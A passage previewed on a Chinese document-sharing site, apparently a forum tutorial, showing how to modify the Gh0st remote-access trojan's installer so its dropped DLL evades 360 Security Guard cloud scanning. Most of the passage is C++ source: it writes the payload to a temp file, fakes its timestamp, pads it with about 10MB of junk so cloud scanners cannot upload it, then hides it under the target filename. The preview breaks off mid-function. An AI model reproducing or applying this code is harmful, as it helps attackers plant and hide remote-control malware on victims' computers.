返回
附加垃圾数据

附加垃圾数据

ID:38473910

大小:31.00 KB

页数:7页

时间:2019-06-13

附加垃圾数据_第1页
附加垃圾数据_第2页
附加垃圾数据_第3页
附加垃圾数据_第4页
附加垃圾数据_第5页
资源描述:

《附加垃圾数据》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、给Gh0st释放的dll添加垃圾附加数据过360安全卫士云查杀-360安全卫士,dll,垃圾,数据,释放给Gh0st释放的dll添加垃圾附加数据过360安全卫士云查杀在一个论坛看到一种过云查杀的思路,也就是靠增大自身文件大小从而让云查杀软件无法上传分析你的服务端,下面是这个方法在Gh0st这个远控上面的应用:一:install工程BOOLReleaseResource(HMODULEhModule,WORDwResourceID,LPCTSTRlpType,LPCTSTRlpFileName,LPCTSTRlpConfigString){HGLOBALhRes;HRS

2、RChResInfo;HANDLEhFile;DWORDdwBytes;charstrTmpPath[MAX_PATH];charstrBinPath[MAX_PATH];//一定要跟别的区分开,GetTickCount有可能得到一样的值GetTempPath(sizeof(strTmpPath),strTmpPath);wsprintf(strBinPath,"%s\%d_res.tmp",strTmpPath,GetTickCount());hResInfo=FindResource(hModule,MAKEINTRESOURCE(wResourceID),lp

3、Type);if(hResInfo==NULL)returnFALSE;hRes=LoadResource(hModule,hResInfo);if(hRes==NULL)returnFALSE;hFile=CreateFile(strBinPath,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);if(hFile==NULL)returnFALSE;SYSTEMTIMEst;memset(&st,0,sizeof(st));st.wYear=2004;st.w

4、Month=8;st.wDay=17;st.wHour=20;st.wMinute=0;FILETIMEft,LocalFileTime;SystemTimeToFileTime(&st,&ft);LocalFileTimeToFileTime(&ft,&LocalFileTime);SetFileTime(hFile,&LocalFileTime,(LPFILETIME)NULL,&LocalFileTime);WriteFile(hFile,hRes,SizeofResource(NULL,hResInfo),&dwBytes,NULL);//写入配置if(lpC

5、onfigString!=NULL){WriteFile(hFile,lpConfigString,lstrlen(lpConfigString)+1,&dwBytes,NULL);//给dll末尾添加垃圾附加数据以增大文件体积inti=0;char*szStrAdd;szStrAdd=newchar[1024*1024];memset(szStrAdd,'.',1024*1024);//这里循环10次,释放的dll大概就是10M了,如果想把dll再弄大点,修改这里就可以了while(i<10){WriteFile(hFile,szStrAdd,lstrlen(szS

6、trAdd),&dwBytes,NULL);i++;}}CloseHandle(hFile);FreeResource(hRes);//FuckKVFileCreateMonitorMoveFile(strBinPath,lpFileName);SetFileAttributes(lpFileName,FILE_ATTRIBUTE_HIDDEN);DeleteFile(strBinPath);returnTRUE;}二:svchost工程//#defineMAX_CONFIG_LEN1024//这句注释掉,改成下面的#defineMAX_CONFIG_LEN90000

7、/*这个数字大概为dll文件字节数的9/10左右就可以了,如上图,这个刚编译出来的dll文件大小为100,864字节,那么我这里把MAX_CONFIG_LEN改成100,864的9/10,就是90,000就可以了*/LPCTSTRFindConfigString(HMODULEhModule,LPCTSTRlpString){charstrFileName[MAX_PATH];char*lpConfigString=NULL;DWORDdwBytesRead=0;GetModuleFileName(hModule,strFileName,sizeof

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。